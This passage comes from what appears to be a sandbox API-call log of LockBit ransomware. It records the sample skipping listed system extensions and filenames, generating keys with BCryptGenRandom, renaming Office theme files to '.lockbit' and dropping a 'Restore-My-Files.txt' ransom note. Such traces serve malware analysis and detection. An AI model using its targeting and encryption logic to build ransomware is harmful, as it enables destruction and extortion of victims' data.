lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.789] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Perspective.xml") returned 1 [0193.789] lstrcmpiW (lpString1="ntldr", lpString2="Perspective.xml") returned -1 [0193.789] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Perspective.xml") returned -1 [0193.789] lstrcmpiW (lpString1="bootsect.bak", lpString2="Perspective.xml") returned -1 [0193.789] lstrcmpiW (lpString1="autorun.inf", lpString2="Perspective.xml") returned -1 [0193.789] lstrcmpiW (lpString1="thumbs.db", lpString2="Perspective.xml") returned 1 [0193.789] lstrcmpiW (lpString1="iconcache.db", lpString2="Perspective.xml") returned -1 [0193.789] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.790] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml") returned=".xml" [0193.790] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.790] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.790] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.791] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.791] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml.lockbit") returned 90 [0193.791] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\perspective.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0193.791] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.792] malloc (_Size=0x40068) returned 0x3df0008 [0193.792] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=966) returned 1 [0193.792] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.792] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0193.792] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0193.793] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0193.799] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.799] malloc (_Size=0xca) returned 0x1fa2ed8 [0193.799] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xca, FileInformationClass=0xa) returned 0x0 [0193.800] free (_Block=0x1fa2ed8) [0193.800] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.800] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.800] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.800] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x938cc00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x51cc30d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x938cc00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pushpin.xml", cAlternateFileName="")) returned 1 [0193.800] lstrcmpiW (lpString1=".", lpString2="Pushpin.xml") returned -1 [0193.801] lstrcmpiW (lpString1="..", lpString2="Pushpin.xml") returned -1 [0193.801] PathFindExtensionW (pszPath="Pushpin.xml") returned=".xml" [0193.801] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.801] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.802] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pushpin.xml") returned 1 [0193.803] lstrcmpiW (lpString1="ntldr", lpString2="Pushpin.xml") returned -1 [0193.803] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pushpin.xml") returned -1 [0193.803] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pushpin.xml") returned -1 [0193.803] lstrcmpiW (lpString1="autorun.inf", lpString2="Pushpin.xml") returned -1 [0193.803] lstrcmpiW (lpString1="thumbs.db", lpString2="Pushpin.xml") returned 1 [0193.803] lstrcmpiW (lpString1="iconcache.db", lpString2="Pushpin.xml") returned -1 [0193.803] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.803] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml") returned=".xml" [0193.803] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.803] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.803] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.804] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.804] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.804] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.804] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.804] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.804] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.804] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.804] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.804] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.804] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.804] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.804] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.804] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml.lockbit") returned 86 [0193.804] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\pushpin.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0193.805] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.805] malloc (_Size=0x40068) returned 0x1ff1e60 [0193.805] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=962) returned 1 [0193.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.806] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0193.806] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.806] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0193.806] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.811] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.811] malloc (_Size=0xc2) returned 0x1fa2ed8 [0193.811] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0193.812] free (_Block=0x1fa2ed8) [0193.812] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.812] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.812] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.812] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19e94200, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19e94200, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Slipstream.xml", cAlternateFileName="SLIPST~1.XML")) returned 1 [0193.812] lstrcmpiW (lpString1=".", lpString2="Slipstream.xml") returned -1 [0193.812] lstrcmpiW (lpString1="..", lpString2="Slipstream.xml") returned -1 [0193.812] PathFindExtensionW (pszPath="Slipstream.xml") returned=".xml" [0193.812] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.812] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.813] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.814] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Slipstream.xml") returned -1 [0193.814] lstrcmpiW (lpString1="ntldr", lpString2="Slipstream.xml") returned -1 [0193.814] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Slipstream.xml") returned -1 [0193.814] lstrcmpiW (lpString1="bootsect.bak", lpString2="Slipstream.xml") returned -1 [0193.814] lstrcmpiW (lpString1="autorun.inf", lpString2="Slipstream.xml") returned -1 [0193.814] lstrcmpiW (lpString1="thumbs.db", lpString2="Slipstream.xml") returned 1 [0193.815] lstrcmpiW (lpString1="iconcache.db", lpString2="Slipstream.xml") returned -1 [0193.815] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.815] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml") returned=".xml" [0193.815] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.815] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.815] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.816] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.816] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.816] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.816] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.816] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.816] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.816] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml.lockbit") returned 89 [0193.816] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\slipstream.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0193.817] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.817] malloc (_Size=0x40068) returned 0x3df0008 [0193.817] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=965) returned 1 [0193.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0193.818] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 